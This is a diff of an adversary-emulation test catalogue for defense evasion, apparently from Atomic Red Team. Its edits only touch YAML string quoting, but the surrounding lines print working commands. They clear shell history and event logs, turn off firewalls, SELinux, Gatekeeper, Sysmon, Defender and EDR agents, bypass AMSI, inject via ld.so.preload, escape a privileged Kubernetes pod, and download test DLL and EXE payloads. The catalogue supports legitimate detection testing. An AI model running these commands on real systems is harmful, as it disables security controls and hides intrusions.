@@ -20237,7 +20237,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -20275,7 +20275,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" 
@@ -20359,71 +20359,71 @@ defense-evasion: auto_generated_guid: a934276e-2be5-4a36-93fd-98adbb5bd4fc description: 'Clears bash history via rm - ' +' supported_platforms: - linux - macos executor: command: 'rm ~/.bash_history - ' +' name: sh - name: Clear Bash history (echo) auto_generated_guid: cbf506a5-dd78-43e5-be7e-a46b7c7a0a11 description: 'Clears bash history via rm - ' +' supported_platforms: - linux executor: command: 'echo "" > ~/.bash_history - ' +' name: sh - name: Clear Bash history (cat dev/null) auto_generated_guid: b1251c35-dcd3-4ea1-86da-36d27b54f31f description: 'Clears bash history via cat /dev/null - ' +' supported_platforms: - linux - macos executor: command: 'cat /dev/null > ~/.bash_history - ' +' name: sh - name: Clear Bash history (ln dev/null) auto_generated_guid: 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 description: 'Clears bash history via a symlink to /dev/null - ' +' supported_platforms: - linux - macos executor: command: 'ln -sf /dev/null ~/.bash_history - ' +' name: sh - name: Clear Bash history (truncate) auto_generated_guid: 47966a1d-df4f-4078-af65-db6d9aa20739 description: 'Clears bash history via truncate - ' +' supported_platforms: - linux executor: command: 'truncate -s0 ~/.bash_history - ' +' name: sh - name: Clear history of a bunch of shells auto_generated_guid: 7e6721df-5f08-4370-9255-f06d8a77af4c description: 'Clears the history of a bunch of different shell types by setting the history size to zero - ' +' supported_platforms: - linux - macos @@ -20438,7 +20438,7 @@ defense-evasion: description: 'Clears the history and disable bash history logging of the current shell and future shell sessions - ' +' supported_platforms: - linux - macos @@ -20458,7 +20458,7 @@ defense-evasion: description: 'Using a space before a command causes the command to not be logged in the Bash History file - ' +' supported_platforms: - linux - macos 
@@ -20473,13 +20473,13 @@ defense-evasion: keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog - ' +' supported_platforms: - linux dependencies: - description: 'Install sshpass and create user account used for excuting - ' +' prereq_command: | /usr/sbin/useradd testuser1 echo pwd101! | passwd testuser1 --stdin @@ -20489,35 +20489,35 @@ defense-evasion: executor: command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname - ' +' cleanup_command: 'userdel -f testuser1 - ' +' name: sh - name: Prevent Powershell History Logging auto_generated_guid: 2f898b81-3e97-4abb-bc3f-a95138988370 description: 'Prevents Powershell history - ' +' supported_platforms: - windows executor: command: 'Set-PSReadlineOption –HistorySaveStyle SaveNothing - ' +' name: powershell cleanup_command: Set-PSReadLineOption -HistorySaveStyle SaveIncrementally - name: Clear Powershell History by Deleting History File auto_generated_guid: da75ae8d-26d6-4483-b0fe-700e4df4f037 description: 'Clears Powershell history - ' +' supported_platforms: - windows executor: command: 'Remove-Item (Get-PSReadlineOption).HistorySavePath - ' +' name: powershell T1070.002: technique: @@ -20568,7 +20568,7 @@ defense-evasion: auto_generated_guid: 989cc1b1-3642-4260-a809-54f9dd559683 description: 'Delete system and audit logs - ' +' supported_platforms: - macos - linux @@ -20584,7 +20584,7 @@ defense-evasion: This technique was used by threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - linux input_arguments: @@ -20595,14 +20595,14 @@ defense-evasion: executor: command: 'echo 0> /var/spool/mail/#{username} - ' +' name: bash - name: Overwrite Linux Log auto_generated_guid: d304b2dc-90b4-4465-a650-16ddd503f7b5 description: 'This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - linux input_arguments: 
@@ -20613,7 +20613,7 @@ defense-evasion: executor: command: 'echo 0> #{log_path} - ' +' name: bash T1070.001: technique: @@ -20681,7 +20681,7 @@ defense-evasion: System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty. - ' +' supported_platforms: - windows input_arguments: @@ -20692,7 +20692,7 @@ defense-evasion: executor: command: 'wevtutil cl #{log_name} - ' +' name: command_prompt elevation_required: true - name: Delete System Logs Using Clear-EventLog @@ -20721,7 +20721,7 @@ defense-evasion: dependencies: - description: 'Microsoft Word must be installed - ' +' prereq_command: | try { New-Object -COMObject "Word.Application" | Out-Null @@ -20731,7 +20731,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -21042,10 +21042,10 @@ defense-evasion: dependencies: - description: 'C# file must exist on disk at specified location (#{input_file}) - ' +' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/calc.cs" -OutFile "#{input_file}" @@ -21053,10 +21053,10 @@ defense-evasion: command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} #{input_file} - ' +' cleanup_command: 'del #{output_file} >nul 2>&1 - ' +' name: command_prompt - name: Dynamic C# Compile auto_generated_guid: 453614d8-3ba6-4147-acc0-7ec4b3e1faef 
@@ -21078,18 +21078,18 @@ defense-evasion: dependencies: - description: 'exe file must exist on disk at specified location (#{input_file}) - ' +' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/bin/T1027.004_DynamicCompile.exe -OutFile #{input_file} - ' +' executor: command: 'Invoke-Expression #{input_file} - ' +' name: powershell T1218.001: technique: @@ -21169,17 +21169,17 @@ defense-evasion: dependencies: - description: 'The payload must exist on disk at specified location (#{local_chm_file}) - ' +' prereq_command: 'if (Test-Path #{local_chm_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{local_chm_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.001/src/T1218.001.chm" -OutFile "#{local_chm_file}" executor: command: 'hh.exe #{local_chm_file} - ' +' name: command_prompt - name: Compiled HTML Help Remote Payload auto_generated_guid: 0f8af516-9818-4172-922b-42986ef1e81d @@ -21196,7 +21196,7 @@ defense-evasion: executor: command: 'hh.exe #{remote_chm_file} - ' +' name: command_prompt - name: Invoke CHM with default Shortcut Command Execution auto_generated_guid: 29d6f0d7-be63-4482-8827-ea77126c1ef7 @@ -21222,7 +21222,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}' @@ -21255,7 +21255,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}' 
@@ -21280,7 +21280,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path}' name: powershell @@ -21321,7 +21321,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath @@ -21360,7 +21360,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath @@ -21513,17 +21513,17 @@ defense-evasion: dependencies: - description: 'Cpl file must exist on disk at specified location (#{cpl_file_path}) - ' +' prereq_command: 'if (Test-Path #{cpl_file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{cpl_file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.002/bin/calc.cpl" -OutFile "#{cpl_file_path}" executor: command: 'control.exe #{cpl_file_path} - ' +' name: command_prompt T1578.002: technique: @@ -21854,10 +21854,10 @@ defense-evasion: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) - ' +' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" 
@@ -21865,7 +21865,7 @@ defense-evasion: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 - ' +' name: command_prompt T1078.001: technique: @@ -21977,16 +21977,16 @@ defense-evasion: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default - ' +' supported_platforms: - windows executor: command: 'net user guest /active:yes - ' +' cleanup_command: 'net user guest /active:no - ' +' name: command_prompt elevation_required: true T1578.003: @@ -22125,7 +22125,7 @@ defense-evasion: description: 'Rename certutil and decode a file. This is in reference to latest research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html) - ' +' supported_platforms: - windows input_arguments: @@ -22148,7 +22148,7 @@ defense-evasion: description: 'Use Python to decode a base64-encoded text string and echo it to the console - ' +' supported_platforms: - linux - macos @@ -22164,13 +22164,13 @@ defense-evasion: dependencies: - description: 'Python must be present - ' +' prereq_command: 'which python3 - ' +' get_prereq_command: 'echo "Please install Python 3" - ' +' executor: name: sh elevation_required: false @@ -22187,7 +22187,7 @@ defense-evasion: description: 'Use Perl to decode a base64-encoded text string and echo it to the console - ' +' supported_platforms: - linux - macos @@ -22203,13 +22203,13 @@ defense-evasion: dependencies: - description: 'Perl must be present - ' +' prereq_command: 'which perl - ' +' get_prereq_command: 'echo "Please install Perl" - ' +' executor: name: sh elevation_required: false @@ -22223,7 +22223,7 @@ defense-evasion: description: 'Use common shell utilities to decode a base64-encoded text string and echo it to the console - ' +' supported_platforms: - linux - macos 
@@ -22254,7 +22254,7 @@ defense-evasion: description: 'Use common shell utilities to decode a hex-encoded text string and echo it to the console - ' +' supported_platforms: - linux - macos @@ -22270,13 +22270,13 @@ defense-evasion: dependencies: - description: 'xxd must be present - ' +' prereq_command: 'which xxd - ' +' get_prereq_command: 'echo "Please install xxd" - ' +' executor: name: sh elevation_required: false @@ -22375,24 +22375,24 @@ defense-evasion: - description: Verify docker is installed. prereq_command: 'which docker - ' +' get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi - ' +' - description: Verify docker service is running. prereq_command: 'sudo systemctl status docker - ' +' get_prereq_command: 'sudo systemctl start docker - ' +' - description: Verify kind is in the path. prereq_command: 'which kind - ' +' get_prereq_command: | curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64 chmod +x ./kind @@ -22400,14 +22400,14 @@ defense-evasion: - description: Verify kind-atomic-cluster is created prereq_command: 'sudo kind get clusters - ' +' get_prereq_command: 'sudo kind create cluster --name atomic-cluster - ' +' - description: Verify kubectl is in path prereq_command: 'which kubectl - ' +' get_prereq_command: | curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" chmod +x ./kubectl 
@@ -22417,11 +22417,11 @@ defense-evasion: -ti --rm --image alpine --overrides ''{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"securityContext":{"privileged":true}}]}}'' - ' +' name: sh cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-escape-pod - ' +' T1006: technique: id: attack-pattern--0c8ab3eb-df48-4b9c-ace7-beacaac81cc5 @@ -22663,7 +22663,7 @@ defense-evasion: command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true - ' +' cleanup_command: | if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){ C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null @@ -22822,10 +22822,10 @@ defense-evasion: executor: command: 'netsh advfirewall set currentprofile state off - ' +' cleanup_command: 'netsh advfirewall set currentprofile state on >nul 2>&1 - ' +' name: command_prompt - name: Disable Microsoft Defender Firewall via Registry auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612 @@ -22838,11 +22838,11 @@ defense-evasion: command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f - ' +' cleanup_command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 1 /f - ' +' name: command_prompt - name: Allow SMB and RDP on Microsoft Defender Firewall auto_generated_guid: d9841bf8-f161-4c73-81e9-fd773a5ff8c1 @@ -22857,7 +22857,7 @@ defense-evasion: netsh advfirewall firewall set rule group="file and printer sharing" new enable=Yes cleanup_command: 'netsh advfirewall reset >nul 2>&1 - ' +' name: command_prompt - name: Opening ports for proxy - HARDRAIN auto_generated_guid: 15e57006-79dd-46df-9bf9-31bc24fb5a80 
@@ -22916,27 +22916,27 @@ defense-evasion: auto_generated_guid: fe135572-edcd-49a2-afe6-1d39521c5a9a description: 'Stop the Uncomplicated Firewall (UFW) if installed. - ' +' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'Check if ufw is installed on the machine. - ' +' prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true command: 'ufw disable - ' +' cleanup_command: | ufw enable ufw status verbose @@ -22950,7 +22950,7 @@ defense-evasion: dependencies: - description: 'Check if systemctl and ufw is installed on the machine. - ' +' prereq_command: "if [ ! -x \"$(command -v systemctl)\" ]; then echo -e \"\\n***** systemctl NOT installed *****\\n\"; exit 1; fi\nif [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; @@ -22958,13 +22958,13 @@ defense-evasion: ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true command: 'systemctl stop ufw - ' +' cleanup_command: | systemctl start ufw systemctl status ufw @@ -22977,20 +22977,20 @@ defense-evasion: dependencies: - description: 'Check if ufw is installed on the machine and enabled. - ' +' prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true command: 'ufw logging off - ' +' cleanup_command: | ufw logging low ufw status verbose 
@@ -23004,14 +23004,14 @@ defense-evasion: dependencies: - description: 'Check if ufw is installed on the machine and enabled. - ' +' prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -23025,21 +23025,21 @@ defense-evasion: auto_generated_guid: beaf815a-c883-4194-97e9-fdbbb2bbdd7c description: 'Edit the Uncomplicated Firewall (UFW) rules file /etc/ufw/user.rules. - ' +' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'Check if /etc/ufw/user.rules exists. - ' +' prereq_command: 'if [ ! -f "/etc/ufw/user.rules" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -23048,7 +23048,7 @@ defense-evasion: grep "# THIS IS A COMMENT" /etc/ufw/user.rules cleanup_command: 'sed -i ''s/# THIS IS A COMMENT//g'' /etc/ufw/user.rules - ' +' - name: Edit UFW firewall ufw.conf file auto_generated_guid: c1d8c4eb-88da-4927-ae97-c7c25893803b description: "Edit the Uncomplicated Firewall (UFW) configuration file /etc/ufw/ufw.conf @@ -23059,14 +23059,14 @@ defense-evasion: dependencies: - description: 'Check if /etc/ufw/ufw.conf exists. - ' +' prereq_command: 'if [ ! -f "/etc/ufw/ufw.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -23086,14 +23086,14 @@ defense-evasion: dependencies: - description: 'Check if /etc/ufw/sysctl.conf exists. - ' +' prereq_command: 'if [ ! -f "/etc/ufw/sysctl.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true 
@@ -23113,14 +23113,14 @@ defense-evasion: dependencies: - description: 'Check if /etc/default/ufw exists. - ' +' prereq_command: 'if [ ! -f "/etc/default/ufw" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -23129,7 +23129,7 @@ defense-evasion: grep "# THIS IS A COMMENT" /etc/default/ufw cleanup_command: 'sed -i ''s/# THIS IS A COMMENT//g'' /etc/default/ufw - ' +' - name: Tail the UFW firewall log file auto_generated_guid: 419cca0c-fa52-4572-b0d7-bc7c6f388a27 description: "Print the last 10 lines of the Uncomplicated Firewall (UFW) log @@ -23140,20 +23140,20 @@ defense-evasion: dependencies: - description: 'Check if /var/log/ufw.log exists. - ' +' prereq_command: 'if [ ! -f "/var/log/ufw.log" ]; then echo -e "\n***** ufw NOT logging *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true command: 'tail /var/log/ufw.log - ' +' cleanup_command: '' T1562.001: technique: @@ -23218,7 +23218,7 @@ defense-evasion: auto_generated_guid: 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8 description: 'Disables syslog collection - ' +' supported_platforms: - linux input_arguments: @@ -23245,11 +23245,11 @@ defense-evasion: dependencies: - description: 'Package with rsyslog must be on system - ' +' prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit 1; fi - ' +' get_prereq_command: "sudo #{package_installer} \n" executor: command: "#{flavor_command}\n" @@ -23260,7 +23260,7 @@ defense-evasion: auto_generated_guid: ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 description: 'Disable the Cb Response service - ' +' supported_platforms: - linux executor: 
@@ -23278,23 +23278,23 @@ defense-evasion: auto_generated_guid: fc225f36-9279-4c39-b3f9-5141ab74f8d8 description: 'Disables SELinux enforcement - ' +' supported_platforms: - linux executor: command: 'setenforce 0 - ' +' cleanup_command: 'setenforce 1 - ' +' name: sh elevation_required: true - name: Stop Crowdstrike Falcon on Linux auto_generated_guid: 828a1278-81cc-4802-96ab-188bf29ca77d description: 'Stop and disable Crowdstrike Falcon on Linux - ' +' supported_platforms: - linux executor: @@ -23310,7 +23310,7 @@ defense-evasion: auto_generated_guid: 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c description: 'Disables Carbon Black Response - ' +' supported_platforms: - macos executor: @@ -23326,48 +23326,48 @@ defense-evasion: auto_generated_guid: 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3 description: 'Disables LittleSnitch - ' +' supported_platforms: - macos executor: command: 'sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist - ' +' cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist - ' +' name: sh elevation_required: true - name: Disable OpenDNS Umbrella auto_generated_guid: 07f43b33-1e15-4e99-be70-bc094157c849 description: 'Disables OpenDNS Umbrella - ' +' supported_platforms: - macos executor: command: 'sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist - ' +' cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist - ' +' name: sh elevation_required: true - name: Disable macOS Gatekeeper auto_generated_guid: 2a821573-fb3f-4e71-92c3-daac7432f053 description: 'Disables macOS Gatekeeper - ' +' supported_platforms: - macos executor: command: 'sudo spctl --master-disable - ' +' cleanup_command: 'sudo spctl --master-enable - ' +' name: sh elevation_required: true - name: Stop and unload Crowdstrike Falcon on macOS 
@@ -23375,7 +23375,7 @@ defense-evasion: description: 'Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS - ' +' supported_platforms: - macos input_arguments: @@ -23413,40 +23413,40 @@ defense-evasion: dependencies: - description: 'Sysmon must be downloaded - ' +' prereq_command: 'if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 } - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip" Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force Remove-Item $env:TEMP\Sysmon.zip -Force - description: 'sysmon must be Installed - ' +' prereq_command: 'if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 } - ' +' get_prereq_command: | if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else { Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i} - description: 'sysmon filter must be loaded - ' +' prereq_command: 'if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 } - ' +' get_prereq_command: | sysmon -u sysmon -accepteula -i executor: command: 'fltmc.exe unload #{sysmon_driver} - ' +' cleanup_command: | sysmon -u -i > nul 2>&1 sysmon -i -accepteula -i > nul 2>&1 @@ -23458,7 +23458,7 @@ defense-evasion: auto_generated_guid: a316fb2e-5344-470d-91c1-23e15c374edc description: 'Uninstall Sysinternals Sysmon for Defense Evasion - ' +' supported_platforms: - windows input_arguments: @@ -23471,10 +23471,10 @@ defense-evasion: dependencies: - description: 'Sysmon executable must be available - ' +' prereq_command: 'if(cmd /c where sysmon) {exit 0} else {exit 1} - ' +' get_prereq_command: | $parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip" New-Item -ItemType Directory $parentpath -Force | Out-Null 
@@ -23483,20 +23483,20 @@ defense-evasion: if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"} - description: 'Sysmon must be installed - ' +' prereq_command: 'if(cmd /c sc query sysmon) { exit 0} else { exit 1} - ' +' get_prereq_command: 'cmd /c sysmon -i -accepteula - ' +' executor: command: 'sysmon -u - ' +' cleanup_command: 'sysmon -i -accepteula >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: AMSI Bypass - AMSI InitFailed @@ -23524,11 +23524,11 @@ defense-evasion: command: 'Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse - ' +' cleanup_command: 'New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null - ' +' name: powershell elevation_required: true - name: Disable Arbitrary Security Windows Service @@ -23602,11 +23602,11 @@ defense-evasion: command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 - ' +' cleanup_command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0 - ' +' name: powershell elevation_required: true - name: Disable Microsoft Office Security Features @@ -23646,7 +23646,7 @@ defense-evasion: command: '"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All - ' +' name: command_prompt elevation_required: true - name: Stop and Remove Arbitrary Security Windows Service @@ -23656,7 +23656,7 @@ defense-evasion: The Remove-Service cmdlet removes a Windows service in the registry and in the service database. - ' +' supported_platforms: - windows input_arguments: @@ -23677,7 +23677,7 @@ defense-evasion: is located in a folder named with a random guid we need to identify it before invoking the uninstaller. - ' +' supported_platforms: - windows input_arguments: 
@@ -24316,21 +24316,21 @@ defense-evasion: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) - ' +' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - ' +' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' - ' +' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload - ' +' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD
@@ -24355,18 +24355,18 @@ defense-evasion: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) - ' +' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - ' +' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls - ' +' name: bash T1055.001: technique:
@@ -24466,10 +24466,10 @@ defense-evasion: dependencies: - description: 'Utility to inject must exist on disk at specified location (#{dll_payload}) - ' +' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}"
@@ -24943,7 +24943,7 @@ defense-evasion: auto_generated_guid: 562d737f-2fc6-4b09-8c2a-7f8ff0828480 description: 'Delete a single file from the temporary directory - ' +' supported_platforms: - linux - macos
@@ -24955,14 +24955,14 @@ defense-evasion: executor: command: 'rm -f #{file_to_delete} - ' +' name: sh - name: Delete an entire folder - Linux/macOS auto_generated_guid: a415f17e-ce8d-4ce2-a8b4-83b674e7017e description: 'Recursively delete the temporary directory and all files contained within it - ' +' supported_platforms: - linux - macos
@@ -24974,14 +24974,14 @@ defense-evasion: executor: command: 'rm -rf #{folder_to_delete} - ' +' name: sh - name: Overwrite and delete a file with shred auto_generated_guid: '039b4b10-2900-404b-b67f-4b6d49aa6499' description: 'Use the `shred` command to overwrite the temporary file and then delete it - ' +' supported_platforms: - linux input_arguments:
@@ -24992,7 +24992,7 @@ defense-evasion: executor: command: 'shred -u #{file_to_shred} - ' +' name: sh - name: Delete a single file - Windows cmd auto_generated_guid: 861ea0b4-708a-4d17-848d-186c9c7f17e3
@@ -25012,17 +25012,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{file_to_delete}) - ' +' prereq_command: 'IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: 'echo deleteme_T1551.004 >> #{file_to_delete} - ' +' executor: command: 'del /f #{file_to_delete} - ' +' name: command_prompt - name: Delete an entire folder - Windows cmd auto_generated_guid: ded937c4-2add-42f7-9c2c-c742b7a98698
@@ -25042,17 +25042,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{folder_to_delete}) - ' +' prereq_command: 'IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: 'mkdir #{folder_to_delete} - ' +' executor: command: 'rmdir /s /q #{folder_to_delete} - ' +' name: command_prompt - name: Delete a single file - Windows PowerShell auto_generated_guid: 9dee89bd-9a98-4c4f-9e2d-4256690b0e72
@@ -25060,7 +25060,7 @@ defense-evasion: Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted. - ' +' supported_platforms: - windows input_arguments:
